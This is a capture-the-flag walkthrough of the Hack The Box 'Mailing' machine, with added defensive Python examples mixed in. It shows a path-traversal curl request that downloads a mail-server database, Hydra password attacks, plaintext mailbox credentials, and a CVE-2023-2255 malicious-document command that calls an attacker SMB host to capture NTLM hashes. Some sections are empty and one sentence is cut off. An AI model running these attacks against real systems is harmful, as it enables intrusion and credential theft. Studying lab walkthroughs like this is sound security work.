Nmap Results
# Nmap 7.94SVN scan initiated Tue May 7 00:00:38 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.180.156
Nmap scan report for 10.129.180.156
Host is up (0.017s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
|_http-server-header: Microsoft-IIS/10.0
110/tcp open pop3 hMailServer pop3d
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
587/tcp open smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
993/tcp open ssl/imap hMailServer imapd
|_imap-capabilities: IMAP4rev1 SORT completed IMAP4 OK NAMESPACE RIGHTS=texkA0001 ACL CHILDREN CAPABILITY IDLE QUOTA
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
65522/tcp open msrpc Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-07T04:04:29
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 7 00:05:05 2024 -- 1 IP address (1 host up) scanned in 267.31 seconds
We can see references to mailing.htb in multiple protocol headers in the nmap scan, so let's go ahead and add that to our /etc/hosts file.
echo '10.129.180.156 mailing.htb' | sudo tee -a /etc/hosts
Service Enumeration
TCP/139,445
smbclient -N -L //10.129.180.156
TCP/80
Testing for Path Traversal and File Inclusion
Find the Configuration File for the Mail Server
Downloading the hMailServer Database
curl -s 'http://mailing.htb/download.php?file=../../../../../Program+Files+(x86)/hMailServer/Database/hMailServer.sdf' -o hMailServer.sdf
git clone https://github.com/GitMirar/hMailDatabasePasswordDecrypter
cd hMailDatabasePasswordDecrypter
make
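The download.php request above is a textbook path traversal: the `file` parameter is decoded and joined onto a directory with no containment check. The following is an added example, not the box's download.php (whose source is not on the page); it shows a naive resolver that reproduces the behaviour abused above next to a hardened one, using the walkthrough's own payload and a constructed IIS layout (`C:\inetpub\wwwroot\downloads`).

```python
"""Path-traversal check for a file-download endpoint.

Added example, not the box's download.php (its source is not on the page):
a naive join that reproduces the behaviour abused above, beside a hardened
resolver that refuses anything outside the download directory. Pure path
arithmetic only, so it runs on any OS without touching the disk.
"""
import re
from urllib.parse import unquote_plus

# Constructed layout: an IIS web root with a dedicated download directory.
DRIVE = "C:"
BASE_PARTS = ["inetpub", "wwwroot", "downloads"]

# The traversal payload from the walkthrough, exactly as it appears in the URL.
PAYLOAD = "../../../../../Program+Files+(x86)/hMailServer/Database/hMailServer.sdf"

_SEP = re.compile(r"[\\/]+")        # IIS accepts both separators
_DRIVE = re.compile(r"^[A-Za-z]:")


def _normalize(parts):
    """Collapse '.' and '..' the way the Windows file API does: a '..' that
    would climb above the drive root is silently dropped, not rejected."""
    out = []
    for part in parts:
        if part in ("", "."):
            continue
        if part == "..":
            if out:
                out.pop()
            continue
        out.append(part)
    return out


def naive_resolve(file_param: str) -> str:
    """The vulnerable pattern: decode the parameter and join it under the
    download directory with no containment check at all."""
    requested = _SEP.split(unquote_plus(file_param))
    return DRIVE + "\\" + "\\".join(_normalize(BASE_PARTS + requested))


def safe_resolve(file_param: str) -> str:
    """Resolve the same parameter, but refuse NUL bytes, absolute paths and
    any result that does not stay strictly below the download directory."""
    decoded = unquote_plus(file_param)
    if "\x00" in decoded:
        raise ValueError("NUL byte in file name")
    if _DRIVE.match(decoded) or decoded[:1] in ("/", "\\"):
        raise ValueError("absolute path not allowed")
    resolved = _normalize(BASE_PARTS + _SEP.split(decoded))
    if resolved[: len(BASE_PARTS)] != BASE_PARTS or len(resolved) == len(BASE_PARTS):
        raise ValueError("path is empty or escapes the download directory")
    return DRIVE + "\\" + "\\".join(resolved)
```

`naive_resolve(PAYLOAD)` lands on the hMailServer database exactly as the curl did, while `safe_resolve` rejects it along with the encoded-backslash, absolute-path and empty variants.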
Reading the Database File
One option is copying the .sdf file to a Windows box and installing a tool on Windows to open the .sdf file. I am going to be using wine on my Kali box to open the file. It was a pain trying to find a binary that will work with wine due to various .NET requirements. For the purpose of reading the .sdf file, I'll be using this application: https://www.flyhoward.com/SDF_Viewer.aspx. It is a Windows binary, which is why we're using wine.
Interesting Info from the Database
git clone https://github.com/mvdnes/hm_decrypt
cd hm_decrypt
# Found that xbuild will compile a CSharp .sln
# Via search with Bing Co-Pilot
xbuild
# xbuild output will show that the binaries are in bin/Debug
cd bin/Debug
Reading the Server Logs
Using a combination of data found on Google and ChatGPT / Bing Co-Pilot, my understanding is that logs should be in C:\Program Files (x86)\hMailServer/Logs/hMailServer_{format}.log, where we substitute {format} for whichever logging type is being recorded.
I tried variations of smtp, pop3, and imap, but couldn't find anything. I did, however, find that awstats.log is enabled.
curl -s 'http://mailing.htb/download.php?file=../../../../../Program+Files+(x86)/hMailServer/Logs/hMailServer_awstats.log' | awk -v FS=' ' '{print $3,$4}' | tr ' ' '\n' | sort -u
TCP/143
Testing IMAP Logins
hydra -I -f -V -L emails.txt -p 'homenetworkingadministrator' -c 1 imap://mailing.htb
hydra -I -f -V -L emails.txt -p 'Bm8zF3c5s7R9L1o2' -c 1 imap://mailing.htb
Mapping Mailboxes with Mutt
Administrator
nano admin-muttrc
set my_mailproto="imap"
set my_mailuser="administrator@mailing.htb"
set my_mailpass="homenetworkingadministrator"
set my_maildomain="mailing.htb"
set ssl_starttls = no
set ssl_force_tls = no
set spoolfile = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set folder = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set record = "Sent"
set postponed = "Drafts"
set mail_check = 60
set timeout = 10
set header_cache = "/tmp/.$my_mailuser-hcache"
set net_inc=5
mutt -F ./admin-muttrc
Mutt starts in the Inbox folder. To change to another folder, press the c key and then ? to select a folder. Press q to quit out of mutt.
Maya
nano maya-muttrc
set my_mailproto="imap"
set my_mailuser="maya@mailing.htb"
set my_mailpass="Bm8zF3c5s7R9L1o2"
set my_maildomain="mailing.htb"
set ssl_starttls = no
set ssl_force_tls = no
set spoolfile = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set folder = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set record = "Sent"
set postponed = "Drafts"
set mail_check = 60
set timeout = 10
set header_cache = "/tmp/.$my_mailuser-hcache"
set net_inc=5
mutt -F maya-muttrc
Exploit
CVE-2024-21413
This really cuts to the point of this box being named Mailing, in that we're looking at sending a crafted email to a user. This crafted email, when viewed using the email client's HTML view, leads to a zero-click NTLM credential theft, as the file:/// link is parsed without any security restraints. When the file:/// link is followed, this leads to an SMB connection to the attacker's system, using NTLM as the authentication mechanism.
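From the defender's side, the dangerous property of such a message is a hyperlink or image source that names a file share rather than a web URL, because the client authenticates to that host over SMB. The following is an added example, not from the walkthrough: a scan of a message's HTML part for file:// and UNC links that reports the host the client would reach out to. SAMPLE_HTML is constructed, and 203.0.113.5 is a documentation address.

```python
"""Flag HTML e-mail links that would make a mail client reach out over SMB.

Added example, not from the walkthrough: a defender-side scan of a message's
HTML part for file:// and UNC hyperlinks, the link type the paragraph above
describes. SAMPLE_HTML is constructed; 203.0.113.5 is a documentation address.
"""
import re
from html.parser import HTMLParser

SAMPLE_HTML = r"""<html><body>
<p>Quarterly report: <a href="https://intranet.example.test/report">here</a></p>
<p><a href="file:///\\203.0.113.5\share\report.docx">Open the shared copy</a></p>
<img src="\\203.0.113.5\share\tracker.png" width="1" height="1">
<p><a href="file:///C:/Users/Public/Documents/exploit.odt">local copy</a></p>
</body></html>"""

_DRIVE = re.compile(r"^[A-Za-z]:")


class _LinkCollector(HTMLParser):
    """Collect href and src values; images matter because they load with no click."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.links.append(value.strip())


def unc_host(url: str):
    """Return the server a file:// or UNC link would make the client authenticate
    to, or None for web links and for local file:///C:/... paths."""
    u = url.strip()
    if u[:5].lower() == "file:":
        u = u[5:]
    elif not u.startswith(("//", "\\\\")):
        return None                      # http(s), mailto and friends
    u = u.replace("\\", "/")             # file:///\\host\share and \\host\share
    body = u.lstrip("/")
    if len(u) - len(body) < 2 or not body or _DRIVE.match(body):
        return None                      # file:/C:/x or file:///C:/x is local
    return body.split("/", 1)[0]


def scan_html(html: str):
    """Return (link, host) for every link that would trigger an outbound SMB
    connection, i.e. the links a mail gateway should strip or quarantine on."""
    collector = _LinkCollector()
    collector.feed(html)
    hits = []
    for link in collector.links:
        host = unc_host(link)
        if host is not None:
            hits.append((link, host))
    return hits
```

On the sample, the https link and the local file:///C:/ link are ignored; the two links naming 203.0.113.5 are reported, including the 1x1 image that needs no click at all.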
We were told to send maya@mailing.htb an email in the instructions.pdf file, as a foreshadowing of the initial foothold.
Test WinRM Access
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Access denied to systeminfo
Current User
User Name SID
============ =============================================
mailing\maya S-1-5-21-3356585197-584674788-3201212231-1002
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============ ==================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compañía Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticación NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================ =======
SeChangeNotifyPrivilege Omitir comprobación de recorrido Enabled
SeUndockPrivilege Quitar equipo de la estación de acoplamiento Enabled
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled
SeTimeZonePrivilege Cambiar la zona horaria Enabled
Users and Groups
Local Users
Name Enabled Description
---- ------- -----------
Administrador False Cuenta integrada para la administración del equipo o dominio
DefaultAccount False Cuenta de usuario administrada por el sistema.
Invitado False Cuenta integrada para el acceso como invitado al equipo o dominio
localadmin True
maya True
WDAGUtilityAccount False Una cuenta de usuario que el sistema administra y usa para escenarios de Protección de aplicaciones de Windows Defender.
Local Groups
Name
----
Administradores
Administradores de Hyper-V
Duplicadores
IIS_IUSRS
Invitados
Lectores del registro de eventos
Operadores criptográficos
Operadores de asistencia de control de acceso
Operadores de configuración de red
Operadores de copia de seguridad
Propietarios del dispositivo
Remote Management Users
System Managed Accounts Group
Usuarios
Usuarios avanzados
Usuarios COM distribuidos
Usuarios de escritorio remoto
Usuarios del monitor de sistema
Usuarios del registro de rendimiento
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::f897:ed7d:f35e:32a8
Temporary IPv6 Address. . . . . . : dead:beef::d8e9:b8a4:3d01:3f62
Link-local IPv6 Address . . . . . : fe80::c1bf:9c37:4c49:944f%14
IPv4 Address. . . . . . . . . . . : 10.129.25.72
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:2bb5%14
10.129.0.1
Scheduled Tasks
Interesting Scheduled Tasks
Run As User: maya
TaskName: \Test
Task To Run: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Users\localadmin\Documents\scripts\soffice.ps1
Run As User: localadmin
TaskName: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319
Task To Run: COM handler
Interesting Files
C:\Users\maya\AppData\Roaming\LibreOffice\4\user\registrymodifications.xcu
<item oor:path="/org.openoffice.Office.Histories/Histories/org.openoffice.Office.Histories:HistoryInfo['PickList']/ItemList"><node oor:name="file:///C:/Users/Public/Documents/exploit.odt" oor:op="replace"><prop oor:name="Title" oor:op="fuse"><value>exploit</value></prop><prop oor:name="Filter" oor:op="fuse"><value>writer8</value></prop><prop oor:name="Password" oor:op="fuse"><value></value></prop><prop oor:name="ReadOnly" oor:op="fuse"><value>false</value></prop><prop oor:name="Thumbnail" oor:op="fuse"><value>[base64 PNG thumbnail omitted]</value></prop></node></item>
<item oor:path="/org.openoffice.Office.Histories/Histories/org.openoffice.Office.Histories:HistoryInfo['PickList']/ItemList"><node oor:name="file:///C:/Users/maya/Documents/exploit.odt" oor:op="replace"><prop oor:name="Title" oor:op="fuse"><value>exploit</value></prop><prop oor:name="Filter" oor:op="fuse"><value>writer8</value></prop><prop oor:name="Password" oor:op="fuse"><value></value></prop><prop oor:name="ReadOnly" oor:op="fuse"><value>false</value></prop><prop oor:name="Thumbnail" oor:op="fuse"><value>[base64 PNG thumbnail omitted]</value></prop></node></item>
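The PickList entries in registrymodifications.xcu are LibreOffice's recent-documents history, which is what makes this file useful in an investigation: it records where a document was opened from, not just that it was opened. The following is an added example, not from the walkthrough: a parser for those entries that converts each file:/// URL to a Windows path and marks documents that lived in a shared directory. SAMPLE_XCU is constructed in the same layout as the file above, with the thumbnail replaced by a placeholder; SHARED_DIRS is a constructed list.

```python
"""Recover LibreOffice's recent-documents list from registrymodifications.xcu.

Added example, not from the walkthrough: a parser for the PickList history
entries shown above, the artefact that tied exploit.odt to the scheduled task
on this box. SAMPLE_XCU is constructed in the same layout, with the base64
thumbnail replaced by a placeholder; the namespace URI is LibreOffice's own.
"""
import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlparse

OOR = "{http://openoffice.org/2001/registry}"      # namespace of oor:* attributes
PICKLIST = "HistoryInfo['PickList']/ItemList"       # recent-documents history node

# Constructed list of locations every local user can write to: a document
# opened from one of these deserves a second look during an investigation.
SHARED_DIRS = (r"c:\users\public", r"c:\windows\temp")

SAMPLE_XCU = """<?xml version="1.0" encoding="UTF-8"?>
<oor:items xmlns:oor="http://openoffice.org/2001/registry">
<item oor:path="/org.openoffice.Office.Histories/Histories/org.openoffice.Office.Histories:HistoryInfo['PickList']/ItemList">
 <node oor:name="file:///C:/Users/Public/Documents/exploit.odt" oor:op="replace">
  <prop oor:name="Title" oor:op="fuse"><value>exploit</value></prop>
  <prop oor:name="Filter" oor:op="fuse"><value>writer8</value></prop>
  <prop oor:name="Thumbnail" oor:op="fuse"><value>THUMBNAIL-PLACEHOLDER</value></prop>
 </node></item>
<item oor:path="/org.openoffice.Office.Histories/Histories/org.openoffice.Office.Histories:HistoryInfo['PickList']/ItemList">
 <node oor:name="file:///C:/Users/maya/Documents/Q1%20report.odt" oor:op="replace">
  <prop oor:name="Title" oor:op="fuse"><value>Q1 report</value></prop>
  <prop oor:name="Filter" oor:op="fuse"><value>writer8</value></prop>
 </node></item>
<item oor:path="/org.openoffice.Setup/Product">
 <prop oor:name="ooSetupLastVersion" oor:op="fuse"><value>7.4</value></prop></item>
</oor:items>"""


def file_url_to_path(url: str) -> str:
    """file:///C:/Users/x/a%20b.odt -> C:\\Users\\x\\a b.odt (UNC when a host is present)."""
    parsed = urlparse(url)
    path = unquote(parsed.path).lstrip("/").replace("/", "\\")
    if parsed.netloc:
        return "\\\\" + parsed.netloc + "\\" + path
    return path


def recent_documents(xcu_text: str):
    """Return one dict per PickList entry: url, Windows path, title, filter,
    and whether the document lived in a shared (world-writable) directory."""
    root = ET.fromstring(xcu_text)
    docs = []
    for item in root.iter("item"):          # only the history items, not other settings
        if not item.get(OOR + "path", "").endswith(PICKLIST):
            continue
        for node in item.findall("node"):
            props = {p.get(OOR + "name"): (p.findtext("value") or "")
                     for p in node.findall("prop")}
            url = node.get(OOR + "name")
            path = file_url_to_path(url)
            docs.append({"url": url, "path": path, "title": props.get("Title", ""),
                         "filter": props.get("Filter", ""),
                         "shared": path.lower().startswith(SHARED_DIRS)})
    return docs
```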
Privilege Escalation
Lateral to localadmin
During the post-exploitation enumeration, a few things stick out to me at first glance:
- C:\Important Documents
- The scheduled task running soffice.ps1 out of C:\Users\localadmin
I was also hunting around in different directories searching for keywords such as password, passw, pass, etc. This is how I landed on the document at C:\Users\maya\AppData\Roaming\LibreOffice\4\user\registrymodifications.xcu, which points me towards the possibility of privilege escalation via a malicious document.
Exploring the Maldoc Avenue
Obviously, we can't read the files in C:\Users\localadmin, so we can't be sure what the soffice.ps1 script is doing, but let's see if we can find any other information that might help.
# Recursively list the entire C:\ volume for files
# Filter on file names containing *soffice*
# Show only full paths
(Get-ChildItem 'C:\' -File -Recurse -Filter '*soffice*' -ErrorAction SilentlyContinue).FullName
C:\Program Files\LibreOffice\program\soffice.ps1
# Set the directory where the .odt files are located
$directory = "C:\Users\Public\Documents"
# Get all files with .odt extension in the specified directory
$files = Get-ChildItem -Path $directory -Filter *.odt
# Loop through each .odt file and open it
foreach ($file in $files) {
    Start-Process $file.FullName
}
Looking at the source code for C:\Program Files\LibreOffice\program\soffice.ps1, we can see that it will attempt to open any *.odt file in a specified directory; in this case, C:\Users\Public\Documents.
I suspect the C:\Users\localadmin\Documents\soffice.ps1 script is a modified version of the one discovered here. It probably reads from a different directory; I'm thinking the C:\Important Documents directory.
This information, coupled with what I found earlier showing references to file:///C:/Users/maya/Documents/exploit.odt, makes me think that my hypothesis to pivot using a maldoc is correct.
Crafting the Maldoc
This was one of the lateral pivots in the HTB Office box as well, so I'll just be using my existing knowledge of the exploit from working on this box. The POC and CVE data are linked just below for more information. But in short, the exploit works due to the fact that in certain versions, LibreOffice will load links in crafted documents without user interaction (zero-click).
# Clone the repo
git clone https://github.com/elweth-sec/CVE-2023-2255
# Enter the directory
cd CVE-2023-2255
# Create the malicious .odt document
python3 CVE-2023-2255.py --cmd '//10.10.14.112/evil/evil.exe' --output pwn.odt
# Start a SMB server to catch the hash
sudo impacket-smbserver -smb2support evil .
rockyou.txt, and we probably won't be able to relay the NetNTLMv2 hash back onto the target itself. So, let's create one more maldoc and finish the job.
Flags
User
9784c83d0dbf02a9f237197737876625
Root
3d664924b00f0be0e92f04db10ff3e76